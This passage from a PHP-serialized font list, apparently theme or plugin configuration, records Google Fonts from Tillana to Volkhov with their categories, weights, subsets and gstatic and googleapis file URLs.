ic.com/s/tillana/v1/pmTtNH_Ibktj5Cyc1XrP6vesZW2xOQ-xsNqO47m55DA.ttf";}s:4:"urls";a:5:{s:7:"regular";s:55:"https://fonts.googleapis.com/css?family=Tillana:regular";i:500;s:51:"https://fonts.googleapis.com/css?family=Tillana:500";i:600;s:51:"https://fonts.googleapis.com/css?family=Tillana:600";i:700;s:51:"https://fonts.googleapis.com/css?family=Tillana:700";i:800;s:51:"https://fonts.googleapis.com/css?family=Tillana:800";}}s:7:"timmana";a:7:{s:4:"name";s:7:"Timmana";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:6:"telugu";}s:5:"files";a:1:{s:7:"regular";s:64:"http://fonts.gstatic.com/s/timmana/v1/T25SicsJUJkc2s2sbBsDnA.ttf";}s:4:"urls";a:1:{s:7:"regular";s:55:"https://fonts.googleapis.com/css?family=Timmana:regular";}}s:5:"tinos";a:7:{s:4:"name";s:5:"Tinos";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:4:{i:0;s:7:"regular";i:1;s:6:"italic";i:2;s:3:"700";i:3;s:9:"700italic";}s:7:"subsets";a:8:{i:0;s:5:"latin";i:1;s:5:"greek";i:2;s:9:"greek-ext";i:3;s:10:"vietnamese";i:4;s:12:"cyrillic-ext";i:5;s:9:"latin-ext";i:6;s:6:"hebrew";i:7;s:8:"cyrillic";}s:5:"files";a:4:{s:7:"regular";s:62:"http://fonts.gstatic.com/s/tinos/v9/EqpUbkVmutfwZ0PjpoGwCg.ttf";s:6:"italic";s:62:"http://fonts.gstatic.com/s/tinos/v9/slfyzlasCr9vTsaP4lUh9A.ttf";i:700;s:62:"http://fonts.gstatic.com/s/tinos/v9/vHXfhX8jZuQruowfon93yQ.ttf";s:9:"700italic";s:83:"http://fonts.gstatic.com/s/tinos/v9/M6kfzvDMM0CdxdraoFpG6vesZW2xOQ-xsNqO47m55DA.ttf";}s:4:"urls";a:4:{s:7:"regular";s:53:"https://fonts.googleapis.com/css?family=Tinos:regular";s:6:"italic";s:52:"https://fonts.googleapis.com/css?family=Tinos:italic";i:700;s:49:"https://fonts.googleapis.com/css?family=Tinos:700";s:9:"700italic";s:55:"https://fonts.googleapis.com/css?family=Tinos:700italic";}}s:9:"titan_one";a:7:{s:4:"name";s:9:"Titan One";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:65:"http://fonts.gstatic.com/s/titanone/v4/FbvpRvzfV_oipS0De3iAZg.ttf";}s:4:"urls";a:1:{s:7:"regular";s:57:"https://fonts.googleapis.com/css?family=Titan+One:regular";}}s:13:"titillium_web";a:7:{s:4:"name";s:13:"Titillium Web";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:11:{i:0;s:3:"200";i:1;s:9:"200italic";i:2;s:3:"300";i:3;s:9:"300italic";i:4;s:7:"regular";i:5;s:6:"italic";i:6;s:3:"600";i:7;s:9:"600italic";i:8;s:3:"700";i:9;s:9:"700italic";i:10;s:3:"900";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:11:{i:200;s:90:"http://fonts.gstatic.com/s/titilliumweb/v4/anMUvcNT0H1YN4FII8wprzOdCrLccoxq42eaxM802O0.ttf";s:9:"200italic";s:90:"http://fonts.gstatic.com/s/titilliumweb/v4/RZunN20OBmkvrU7sA4GPPj4N98U-66ThNJvtgddRfBE.ttf";i:300;s:90:"http://fonts.gstatic.com/s/titilliumweb/v4/anMUvcNT0H1YN4FII8wpr9ZAkYT8DuUZELiKLwMGWAo.ttf";s:9:"300italic";s:90:"http://fonts.gstatic.com/s/titilliumweb/v4/RZunN20OBmkvrU7sA4GPPrfzCkqg7ORZlRf2cc4mXu8.ttf";s:7:"regular";s:90:"http://fonts.gstatic.com/s/titilliumweb/v4/7XUFZ5tgS-tD6QamInJTcTyagQBwYgYywpS70xNq8SQ.ttf";s:6:"italic";s:90:"http://fonts.gstatic.com/s/titilliumweb/v4/r9OmwyQxrgzUAhaLET_KO-ixohbIP6lHkU-1Mgq95cY.ttf";i:600;s:90:"http://fonts.gstatic.com/s/titilliumweb/v4/anMUvcNT0H1YN4FII8wpr28K9dEd5Ue-HTQrlA7E2xQ.ttf";s:9:"600italic";s:90:"http://fonts.gstatic.com/s/titilliumweb/v4/RZunN20OBmkvrU7sA4GPPgOhzTSndyK8UWja2yJjKLc.ttf";i:700;s:90:"http://fonts.gstatic.com/s/titilliumweb/v4/anMUvcNT0H1YN4FII8wpr2-6tpSbB9YhmWtmd1_gi_U.ttf";s:9:"700italic";s:90:"http://fonts.gstatic.com/s/titilliumweb/v4/RZunN20OBmkvrU7sA4GPPio3LEw-4MM8Ao2j9wPOfpw.ttf";i:900;s:90:"http://fonts.gstatic.com/s/titilliumweb/v4/anMUvcNT0H1YN4FII8wpr7L0GmZLri-m-nfoo0Vul4Y.ttf";}s:4:"urls";a:11:{i:200;s:57:"https://fonts.googleapis.com/css?family=Titillium+Web:200";s:9:"200italic";s:63:"https://fonts.googleapis.com/css?family=Titillium+Web:200italic";i:300;s:57:"https://fonts.googleapis.com/css?family=Titillium+Web:300";s:9:"300italic";s:63:"https://fonts.googleapis.com/css?family=Titillium+Web:300italic";s:7:"regular";s:61:"https://fonts.googleapis.com/css?family=Titillium+Web:regular";s:6:"italic";s:60:"https://fonts.googleapis.com/css?family=Titillium+Web:italic";i:600;s:57:"https://fonts.googleapis.com/css?family=Titillium+Web:600";s:9:"600italic";s:63:"https://fonts.googleapis.com/css?family=Titillium+Web:600italic";i:700;s:57:"https://fonts.googleapis.com/css?family=Titillium+Web:700";s:9:"700italic";s:63:"https://fonts.googleapis.com/css?family=Titillium+Web:700italic";i:900;s:57:"https://fonts.googleapis.com/css?family=Titillium+Web:900";}}s:11:"trade_winds";a:7:{s:4:"name";s:11:"Trade Winds";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:88:"http://fonts.gstatic.com/s/tradewinds/v5/sDOCVgAxw6PEUi2xdMsoDaCWcynf_cDxXwCLxiixG1c.ttf";}s:4:"urls";a:1:{s:7:"regular";s:59:"https://fonts.googleapis.com/css?family=Trade+Winds:regular";}}s:7:"trirong";a:7:{s:4:"name";s:7:"Trirong";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:18:{i:0;s:3:"100";i:1;s:9:"100italic";i:2;s:3:"200";i:3;s:9:"200italic";i:4;s:3:"300";i:5;s:9:"300italic";i:6;s:7:"regular";i:7;s:6:"italic";i:8;s:3:"500";i:9;s:9:"500italic";i:10;s:3:"600";i:11;s:9:"600italic";i:12;s:3:"700";i:13;s:9:"700italic";i:14;s:3:"800";i:15;s:9:"800italic";i:16;s:3:"900";i:17;s:9:"900italic";}s:7:"subsets";a:4:{i:0;s:5:"latin";i:1;s:4:"thai";i:2;s:10:"vietnamese";i:3;s:9:"latin-ext";}s:5:"files";a:18:{i:100;s:64:"http://fonts.gstatic.com/s/trirong/v1/A4AP1moxqvtadq5CW3L17A.ttf";s:9:"100italic";s:85:"http://fonts.gstatic.com/s/trirong/v1/ke-m75CXBPHlqwRHmCTBi6CWcynf_cDxXwCLxiixG1c.ttf";i:200;s:85:"http://fonts.gstatic.com/s/trirong/v1/QD8N5qk-agpAEYCSSWullPesZW2xOQ-xsNqO47m55DA.ttf";s:9:"200italic";s:85:"http://fonts.gstatic.com/s/trirong/v1/TLnptEEWKdIVHKJYBO592y3USBnSvpkopQaUR-2r7iU.ttf";i:300;s:85:"http://fonts.gstatic.com/s/trirong/v1/mfCfGz4GqprWJZ47PUMDGfesZW2xOQ-xsNqO47m55DA.ttf";s:9:"300italic";s:85:"http://fonts.gstatic.com/s/trirong/v1/RnkK09k5OfEHFxd_smcYuC3USBnSvpkopQaUR-2r7iU.ttf";s:7:"regular";s:64:"http://fonts.gstatic.com/s/trirong/v1/lYu4kez-Enlvh2X-itx6CA.ttf";s:6:"italic";s:64:"http://fonts.gstatic.com/s/trirong/v1/kV0MzmWPKkglEtJf--dQhQ.ttf";i:500;s:85:"http://fonts.gstatic.com/s/trirong/v1/6CsQ6UR1e8rURaEPxqnGBvesZW2xOQ-xsNqO47m55DA.ttf";s:9:"500italic";s:85:"http://fonts.gstatic.com/s/trirong/v1/I7H5Vf-5oH45BHkyxaUodS3USBnSvpkopQaUR-2r7iU.ttf";i:600;s:85:"http://fonts.gstatic.com/s/trirong/v1/1FjmLIhPhB6Yc7RWqO27mfesZW2xOQ-xsNqO47m55DA.ttf";s:9:"600italic";s:85:"http://fonts.gstatic.com/s/trirong/v1/BXLhSV51vCWUiACSqyWe6i3USBnSvpkopQaUR-2r7iU.ttf";i:700;s:85:"http://fonts.gstatic.com/s/trirong/v1/ab8hG5CTSzMAobTnPgcDP_esZW2xOQ-xsNqO47m55DA.ttf";s:9:"700italic";s:85:"http://fonts.gstatic.com/s/trirong/v1/CEBv6IoZawJuRHdATx4LQi3USBnSvpkopQaUR-2r7iU.ttf";i:800;s:85:"http://fonts.gstatic.com/s/trirong/v1/UBRQXGJvi5EHcyI5wwZew_esZW2xOQ-xsNqO47m55DA.ttf";s:9:"800italic";s:85:"http://fonts.gstatic.com/s/trirong/v1/lGUgSzOvjUqrsrJfnROivC3USBnSvpkopQaUR-2r7iU.ttf";i:900;s:85:"http://fonts.gstatic.com/s/trirong/v1/Lam1ewMdiP3O-bVYT-W6t_esZW2xOQ-xsNqO47m55DA.ttf";s:9:"900italic";s:85:"http://fonts.gstatic.com/s/trirong/v1/EtuLHyx5DS9oX5NoKhYlkC3USBnSvpkopQaUR-2r7iU.ttf";}s:4:"urls";a:18:{i:100;s:51:"https://fonts.googleapis.com/css?family=Trirong:100";s:9:"100italic";s:57:"https://fonts.googleapis.com/css?family=Trirong:100italic";i:200;s:51:"https://fonts.googleapis.com/css?family=Trirong:200";s:9:"200italic";s:57:"https://fonts.googleapis.com/css?family=Trirong:200italic";i:300;s:51:"https://fonts.googleapis.com/css?family=Trirong:300";s:9:"300italic";s:57:"https://fonts.googleapis.com/css?family=Trirong:300italic";s:7:"regular";s:55:"https://fonts.googleapis.com/css?family=Trirong:regular";s:6:"italic";s:54:"https://fonts.googleapis.com/css?family=Trirong:italic";i:500;s:51:"https://fonts.googleapis.com/css?family=Trirong:500";s:9:"500italic";s:57:"https://fonts.googleapis.com/css?family=Trirong:500italic";i:600;s:51:"https://fonts.googleapis.com/css?family=Trirong:600";s:9:"600italic";s:57:"https://fonts.googleapis.com/css?family=Trirong:600italic";i:700;s:51:"https://fonts.googleapis.com/css?family=Trirong:700";s:9:"700italic";s:57:"https://fonts.googleapis.com/css?family=Trirong:700italic";i:800;s:51:"https://fonts.googleapis.com/css?family=Trirong:800";s:9:"800italic";s:57:"https://fonts.googleapis.com/css?family=Trirong:800italic";i:900;s:51:"https://fonts.googleapis.com/css?family=Trirong:900";s:9:"900italic";s:57:"https://fonts.googleapis.com/css?family=Trirong:900italic";}}s:7:"trocchi";a:7:{s:4:"name";s:7:"Trocchi";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:64:"http://fonts.gstatic.com/s/trocchi/v4/uldNPaKrUGVeGCVsmacLwA.ttf";}s:4:"urls";a:1:{s:7:"regular";s:55:"https://fonts.googleapis.com/css?family=Trocchi:regular";}}s:7:"trochut";a:7:{s:4:"name";s:7:"Trochut";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:3:{i:0;s:7:"regular";i:1;s:6:"italic";i:2;s:3:"700";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:3:{s:7:"regular";s:64:"http://fonts.gstatic.com/s/trochut/v4/6Y65B0x-2JsnYt16OH5omw.ttf";s:6:"italic";s:64:"http://fonts.gstatic.com/s/trochut/v4/pczUwr4ZFvC79TgNO5cZng.ttf";i:700;s:85:"http://fonts.gstatic.com/s/trochut/v4/lWqNOv6ISR8ehNzGLFLnJ_esZW2xOQ-xsNqO47m55DA.ttf";}s:4:"urls";a:3:{s:7:"regular";s:55:"https://fonts.googleapis.com/css?family=Trochut:regular";s:6:"italic";s:54:"https://fonts.googleapis.com/css?family=Trochut:italic";i:700;s:51:"https://fonts.googleapis.com/css?family=Trochut:700";}}s:7:"trykker";a:7:{s:4:"name";s:7:"Trykker";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:64:"http://fonts.gstatic.com/s/trykker/v5/YiVrVJpBFN7I1l_CWk6yYQ.ttf";}s:4:"urls";a:1:{s:7:"regular";s:55:"https://fonts.googleapis.com/css?family=Trykker:regular";}}s:10:"tulpen_one";a:7:{s:4:"name";s:10:"Tulpen One";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:87:"http://fonts.gstatic.com/s/tulpenone/v6/lwcTfVIEVxpZLZlWzR5baPesZW2xOQ-xsNqO47m55DA.ttf";}s:4:"urls";a:1:{s:7:"regular";s:58:"https://fonts.googleapis.com/css?family=Tulpen+One:regular";}}s:6:"ubuntu";a:7:{s:4:"name";s:6:"Ubuntu";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:8:{i:0;s:3:"300";i:1;s:9:"300italic";i:2;s:7:"regular";i:3;s:6:"italic";i:4;s:3:"500";i:5;s:9:"500italic";i:6;s:3:"700";i:7;s:9:"700italic";}s:7:"subsets";a:6:{i:0;s:5:"latin";i:1;s:5:"greek";i:2;s:9:"greek-ext";i:3;s:12:"cyrillic-ext";i:4;s:9:"latin-ext";i:5;s:8:"cyrillic";}s:5:"files";a:8:{i:300;s:63:"http://fonts.gstatic.com/s/ubuntu/v9/7-wH0j2QCTHKgp7vLh9-sQ.ttf";s:9:"300italic";s:84:"http://fonts.gstatic.com/s/ubuntu/v9/j-TYDdXcC_eQzhhp386SjaCWcynf_cDxXwCLxiixG1c.ttf";s:7:"regular";s:63:"http://fonts.gstatic.com/s/ubuntu/v9/lhhB5ZCwEkBRbHMSnYuKyA.ttf";s:6:"italic";s:63:"http://fonts.gstatic.com/s/ubuntu/v9/b9hP8wd30SygxZjGGk4DCQ.ttf";i:500;s:63:"http://fonts.gstatic.com/s/ubuntu/v9/bMbHEMwSUmkzcK2x_74QbA.ttf";s:9:"500italic";s:84:"http://fonts.gstatic.com/s/ubuntu/v9/NWdMogIO7U6AtEM4dDdf_aCWcynf_cDxXwCLxiixG1c.ttf";i:700;s:63:"http://fonts.gstatic.com/s/ubuntu/v9/B7BtHjNYwAp3HgLNagENOQ.ttf";s:9:"700italic";s:84:"http://fonts.gstatic.com/s/ubuntu/v9/pqisLQoeO9YTDCNnlQ9bf6CWcynf_cDxXwCLxiixG1c.ttf";}s:4:"urls";a:8:{i:300;s:50:"https://fonts.googleapis.com/css?family=Ubuntu:300";s:9:"300italic";s:56:"https://fonts.googleapis.com/css?family=Ubuntu:300italic";s:7:"regular";s:54:"https://fonts.googleapis.com/css?family=Ubuntu:regular";s:6:"italic";s:53:"https://fonts.googleapis.com/css?family=Ubuntu:italic";i:500;s:50:"https://fonts.googleapis.com/css?family=Ubuntu:500";s:9:"500italic";s:56:"https://fonts.googleapis.com/css?family=Ubuntu:500italic";i:700;s:50:"https://fonts.googleapis.com/css?family=Ubuntu:700";s:9:"700italic";s:56:"https://fonts.googleapis.com/css?family=Ubuntu:700italic";}}s:16:"ubuntu_condensed";a:7:{s:4:"name";s:16:"Ubuntu Condensed";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:6:{i:0;s:5:"latin";i:1;s:5:"greek";i:2;s:9:"greek-ext";i:3;s:12:"cyrillic-ext";i:4;s:9:"latin-ext";i:5;s:8:"cyrillic";}s:5:"files";a:1:{s:7:"regular";s:93:"http://fonts.gstatic.com/s/ubuntucondensed/v7/DBCt-NXN57MTAFjitYxdrKDbm6fPDOZJsR8PmdG62gY.ttf";}s:4:"urls";a:1:{s:7:"regular";s:64:"https://fonts.googleapis.com/css?family=Ubuntu+Condensed:regular";}}s:11:"ubuntu_mono";a:7:{s:4:"name";s:11:"Ubuntu Mono";s:8:"category";s:9:"monospace";s:9:"font_type";s:6:"google";s:12:"font_weights";a:4:{i:0;s:7:"regular";i:1;s:6:"italic";i:2;s:3:"700";i:3;s:9:"700italic";}s:7:"subsets";a:6:{i:0;s:5:"latin";i:1;s:5:"greek";i:2;s:9:"greek-ext";i:3;s:12:"cyrillic-ext";i:4;s:9:"latin-ext";i:5;s:8:"cyrillic";}s:5:"files";a:4:{s:7:"regular";s:88:"http://fonts.gstatic.com/s/ubuntumono/v6/EgeuS9OtEmA0y_JRo03MQaCWcynf_cDxXwCLxiixG1c.ttf";s:6:"italic";s:88:"http://fonts.gstatic.com/s/ubuntumono/v6/KAKuHXAHZOeECOWAHsRKA0eOrDcLawS7-ssYqLr2Xp4.ttf";i:700;s:88:"http://fonts.gstatic.com/s/ubuntumono/v6/ceqTZGKHipo8pJj4molytne1Pd76Vl7zRpE7NLJQ7XU.ttf";s:9:"700italic";s:88:"http://fonts.gstatic.com/s/ubuntumono/v6/n_d8tv_JOIiYyMXR4eaV9c_zJjSACmk0BRPxQqhnNLU.ttf";}s:4:"urls";a:4:{s:7:"regular";s:59:"https://fonts.googleapis.com/css?family=Ubuntu+Mono:regular";s:6:"italic";s:58:"https://fonts.googleapis.com/css?family=Ubuntu+Mono:italic";i:700;s:55:"https://fonts.googleapis.com/css?family=Ubuntu+Mono:700";s:9:"700italic";s:61:"https://fonts.googleapis.com/css?family=Ubuntu+Mono:700italic";}}s:5:"ultra";a:7:{s:4:"name";s:5:"Ultra";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:62:"http://fonts.gstatic.com/s/ultra/v8/OW8uXkOstRADuhEmGOFQLA.ttf";}s:4:"urls";a:1:{s:7:"regular";s:53:"https://fonts.googleapis.com/css?family=Ultra:regular";}}s:14:"uncial_antiqua";a:7:{s:4:"name";s:14:"Uncial Antiqua";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:91:"http://fonts.gstatic.com/s/uncialantiqua/v4/F-leefDiFwQXsyd6eaSllqrFJ4O13IHVxZbM6yoslpo.ttf";}s:4:"urls";a:1:{s:7:"regular";s:62:"https://fonts.googleapis.com/css?family=Uncial+Antiqua:regular";}}s:8:"underdog";a:7:{s:4:"name";s:8:"Underdog";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:3:{i:0;s:5:"latin";i:1;s:9:"latin-ext";i:2;s:8:"cyrillic";}s:5:"files";a:1:{s:7:"regular";s:65:"http://fonts.gstatic.com/s/underdog/v5/gBv9yjez_-5PnTprHWq0ig.ttf";}s:4:"urls";a:1:{s:7:"regular";s:56:"https://fonts.googleapis.com/css?family=Underdog:regular";}}s:9:"unica_one";a:7:{s:4:"name";s:9:"Unica One";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:65:"http://fonts.gstatic.com/s/unicaone/v4/KbYKlhWMDpatWViqDkNQgA.ttf";}s:4:"urls";a:1:{s:7:"regular";s:57:"https://fonts.googleapis.com/css?family=Unica+One:regular";}}s:14:"unifrakturcook";a:7:{s:4:"name";s:14:"UnifrakturCook";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:3:"700";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{i:700;s:92:"http://fonts.gstatic.com/s/unifrakturcook/v8/ASwh69ykD8iaoYijVEU6RrWZkcsCTHKV51zmcUsafQ0.ttf";}s:4:"urls";a:1:{i:700;s:58:"https://fonts.googleapis.com/css?family=UnifrakturCook:700";}}s:18:"unifrakturmaguntia";a:7:{s:4:"name";s:18:"UnifrakturMaguntia";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:96:"http://fonts.gstatic.com/s/unifrakturmaguntia/v7/7KWy3ymCVR_xfAvvcIXm3-kdNg30GQauG_DE-tMYtWk.ttf";}s:4:"urls";a:1:{s:7:"regular";s:66:"https://fonts.googleapis.com/css?family=UnifrakturMaguntia:regular";}}s:7:"unkempt";a:7:{s:4:"name";s:7:"Unkempt";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:2:{i:0;s:7:"regular";i:1;s:3:"700";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:2:{s:7:"regular";s:64:"http://fonts.gstatic.com/s/unkempt/v7/NLLBeNSspr0RGs71R5LHWA.ttf";i:700;s:85:"http://fonts.gstatic.com/s/unkempt/v7/V7H-GCl9bgwGwqFqTTgDHvesZW2xOQ-xsNqO47m55DA.ttf";}s:4:"urls";a:2:{s:7:"regular";s:55:"https://fonts.googleapis.com/css?family=Unkempt:regular";i:700;s:51:"https://fonts.googleapis.com/css?family=Unkempt:700";}}s:6:"unlock";a:7:{s:4:"name";s:6:"Unlock";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:63:"http://fonts.gstatic.com/s/unlock/v6/rXEQzK7uIAlhoyoAEiMy1w.ttf";}s:4:"urls";a:1:{s:7:"regular";s:54:"https://fonts.googleapis.com/css?family=Unlock:regular";}}s:4:"unna";a:7:{s:4:"name";s:4:"Unna";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:61:"http://fonts.gstatic.com/s/unna/v8/UAS0AM7AmbdCNY_80xyAZQ.ttf";}s:4:"urls";a:1:{s:7:"regular";s:52:"https://fonts.googleapis.com/css?family=Unna:regular";}}s:5:"vt323";a:7:{s:4:"name";s:5:"VT323";s:8:"category";s:9:"monospace";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:62:"http://fonts.gstatic.com/s/vt323/v7/ITU2YQfM073o1iYK3nSOmQ.ttf";}s:4:"urls";a:1:{s:7:"regular";s:53:"https://fonts.googleapis.com/css?family=VT323:regular";}}s:11:"vampiro_one";a:7:{s:4:"name";s:11:"Vampiro One";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:88:"http://fonts.gstatic.com/s/vampiroone/v7/OVDs4gY4WpS5u3Qd1gXRW6CWcynf_cDxXwCLxiixG1c.ttf";}s:4:"urls";a:1:{s:7:"regular";s:59:"https://fonts.googleapis.com/css?family=Vampiro+One:regular";}}s:6:"varela";a:7:{s:4:"name";s:6:"Varela";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:63:"http://fonts.gstatic.com/s/varela/v7/ON7qs0cKUUixhhDFXlZUjw.ttf";}s:4:"urls";a:1:{s:7:"regular";s:54:"https://fonts.googleapis.com/css?family=Varela:regular";}}s:12:"varela_round";a:7:{s:4:"name";s:12:"Varela Round";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:6:"hebrew";}s:5:"files";a:1:{s:7:"regular";s:89:"http://fonts.gstatic.com/s/varelaround/v7/APH4jr0uSos5wiut5cpjri3USBnSvpkopQaUR-2r7iU.ttf";}s:4:"urls";a:1:{s:7:"regular";s:60:"https://fonts.googleapis.com/css?family=Varela+Round:regular";}}s:11:"vast_shadow";a:7:{s:4:"name";s:11:"Vast Shadow";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:88:"http://fonts.gstatic.com/s/vastshadow/v6/io4hqKX3ibiqQQjYfW0-h6CWcynf_cDxXwCLxiixG1c.ttf";}s:4:"urls";a:1:{s:7:"regular";s:59:"https://fonts.googleapis.com/css?family=Vast+Shadow:regular";}}s:12:"vesper_libre";a:7:{s:4:"name";s:12:"Vesper Libre";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:4:{i:0;s:7:"regular";i:1;s:3:"500";i:2;s:3:"700";i:3;s:3:"900";}s:7:"subsets";a:3:{i:0;s:5:"latin";i:1;s:9:"latin-ext";i:2;s:10:"devanagari";}s:5:"files";a:4:{s:7:"regular";s:89:"http://fonts.gstatic.com/s/vesperlibre/v8/Cg-TeZFsqV8BaOcoVwzu2C3USBnSvpkopQaUR-2r7iU.ttf";i:500;s:89:"http://fonts.gstatic.com/s/vesperlibre/v8/0liLgNkygqH6EOtsVjZDsZMQuUSAwdHsY8ov_6tk1oA.ttf";i:700;s:89:"http://fonts.gstatic.com/s/vesperlibre/v8/0liLgNkygqH6EOtsVjZDsUD2ttfZwueP-QU272T9-k4.ttf";i:900;s:89:"http://fonts.gstatic.com/s/vesperlibre/v8/0liLgNkygqH6EOtsVjZDsaObDOjC3UL77puoeHsE3fw.ttf";}s:4:"urls";a:4:{s:7:"regular";s:60:"https://fonts.googleapis.com/css?family=Vesper+Libre:regular";i:500;s:56:"https://fonts.googleapis.com/css?family=Vesper+Libre:500";i:700;s:56:"https://fonts.googleapis.com/css?family=Vesper+Libre:700";i:900;s:56:"https://fonts.googleapis.com/css?family=Vesper+Libre:900";}}s:5:"vibur";a:7:{s:4:"name";s:5:"Vibur";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:62:"http://fonts.gstatic.com/s/vibur/v7/xB9aKsUbJo68XP0bAg2iLw.ttf";}s:4:"urls";a:1:{s:7:"regular";s:53:"https://fonts.googleapis.com/css?family=Vibur:regular";}}s:8:"vidaloka";a:7:{s:4:"name";s:8:"Vidaloka";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:65:"http://fonts.gstatic.com/s/vidaloka/v8/C6Nul0ogKUWkx356rrt9RA.ttf";}s:4:"urls";a:1:{s:7:"regular";s:56:"https://fonts.googleapis.com/css?family=Vidaloka:regular";}}s:4:"viga";a:7:{s:4:"name";s:4:"Viga";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:61:"http://fonts.gstatic.com/s/viga/v5/uD87gDbhS7frHLX4uL6agg.ttf";}s:4:"urls";a:1:{s:7:"regular";s:52:"https://fonts.googleapis.com/css?family=Viga:regular";}}s:5:"voces";a:7:{s:4:"name";s:5:"Voces";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:62:"http://fonts.gstatic.com/s/voces/v5/QoBH6g6yKgNIgvL8A2aE2Q.ttf";}s:4:"urls";a:1:{s:7:"regular";s:53:"https://fonts.googleapis.com/css?family=Voces:regular";}}s:7:"volkhov";a:7:{s:4:"name";s:7:"Volkhov";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:4:{i:0;s:7:"regular";i:1;s:6:"italic";i:2;s:3:"700";i:3;s:9:"700italic";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s